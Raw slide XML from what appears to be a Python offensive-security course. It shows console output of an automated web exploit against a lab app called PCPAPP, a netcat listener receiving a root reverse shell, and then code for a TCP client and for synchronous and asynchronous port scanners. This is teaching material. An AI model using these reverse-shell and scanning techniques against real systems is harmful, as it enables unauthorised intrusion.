              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Extracting the contest's ID..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] Found contest's ID: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] Contest has been activated successfully!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] The language has been added </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sucessfully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to contest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] The problem has been added to contest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] Subscribed successfully to contest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Waiting for the contest to start :)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] Our code should have been executed!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76B823B7-4301-4468-BD9B-6DECA70119DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2493431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Basic Web : Automating Web Exploits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t>If we look back at our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> listener, we see that we get a nice reverse shell 😁 !!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CE04BFE-78DD-4585-896E-1080D70D3DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1423176" y="2328241"/>
            <a:ext cx="10137507"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nc</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vlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 9998</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>listening on [any] 9998 ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.16.238.100: inverse host lookup failed: Unknown host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>connect to [172.16.238.1] from (UNKNOWN) [172.16.238.100] 58848</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@pcpapp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usr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/app/public#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{096A3049-118A-41F3-A5F5-B278AD4B3CBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014663" y="3797301"/>
            <a:ext cx="10954534"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b="1" dirty="0"/>
              <a:t>We have successfully exploited the PCPAPP and achieved remote code execution (RCE).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68B40416-8C79-4A19-B109-BF1934E9A85A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="10585" t="34352" r="10526" b="35197"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3412959" y="4496920"/>
            <a:ext cx="5410200" cy="2088364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Slide Number Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C79F06D-AA39-4FE3-85BA-32AA886F349E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162284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267908" y="218310"/>
            <a:ext cx="2020597" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Network</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Working with socket : Simple TCP client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create a TCP client and connect to a target host and port as follows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD0146E-BFB6-4408-AA55-310466A75A4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324025" y="2336263"/>
            <a:ext cx="1013750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 socket</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socket.AF_INET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socket.SOCK_STREAM</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s.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((host, port))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s.send</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b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Hello</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data_received</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s.recv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1024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"Received</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> bytes:"</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data_received</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&lt;host&gt; &lt;port&gt;"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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Slide Number Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BD4E63B-7A29-4836-99BA-C19E4D913F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1466656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Working with socket : Simple TCP client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try to launch it with scanme.nmap.org as a host, and 22 (SSH) as a port, we will get this:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD0146E-BFB6-4408-AA55-310466A75A4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324025" y="2336263"/>
            <a:ext cx="10137507"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python tcp_client.py scanme.nmap.org 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Received bytes: b'SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13\r\n'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{918384CA-31FC-4DB1-8D55-27F5DADED616}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014663" y="3167862"/>
            <a:ext cx="10254916" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH on the target has sent its banner back. This behavior doesn’t relate to our input “Hello!” since SSH on its default configuration will send its banner to any connecting socket.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E1C951D-AB76-4184-84DD-0F1D99A5492C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97198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Working with socket : Simple TCP port scanner</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14663" y="1731880"/>
            <a:ext cx="10954534"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write a simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>synchronous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> TCP port scanner:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD0146E-BFB6-4408-AA55-310466A75A4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324025" y="2336263"/>
            <a:ext cx="1013750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socket, sys</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tcp_scan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port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65536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socket.AF_INET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socket.SOCK_STREAM</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s.settimeout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s.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((host, port))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ConnectionRefusedError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socket.timeout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pass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port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open"</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tcp_scan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36316129-72FC-44D2-B81A-AB1E75788F81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="705518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Working with socket : Simple TCP port scanner (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BEB6859-F88A-4EC7-A3E0-726E4CAB3DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851342" y="3226747"/>
            <a:ext cx="10954534" cy="188365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The problem with the previous TCP port scanner is that it’s slow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The reason is that it checks for every port sequentially port after another.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If one port is filtered, the script will wait for 1 second until it gives up.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If all ports are filtered on the target, the script will take over 18 hours to complete!! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B556D2D-908F-4E86-A926-80AC961A14C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259856" y="2194161"/>
            <a:ext cx="10137507"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 simple_tcp_port_scanner.py 172.16.238.100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>... waiting ...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBA3B8E9-6555-49BF-91E7-1543225728D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251889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Working with socket : Simple asynchronous TCP port scanner (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B556D2D-908F-4E86-A926-80AC961A14C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231782" y="1929466"/>
            <a:ext cx="10137507" cy="397031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asyncio, sys</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sem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asyncio.Semaphore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400</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tcp_scan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conn = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asyncio.open_connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(host, port)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asyncio.wait_for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(conn,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port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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> open"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err="1">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ConnectionRefusedError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asyncio.TimeoutError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pass</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coros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tcp_scan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port)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port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65536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asyncio.gather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coros</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asyncio.run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(main())</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D9CB18-6605-408F-AA2D-F2B74FED3652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
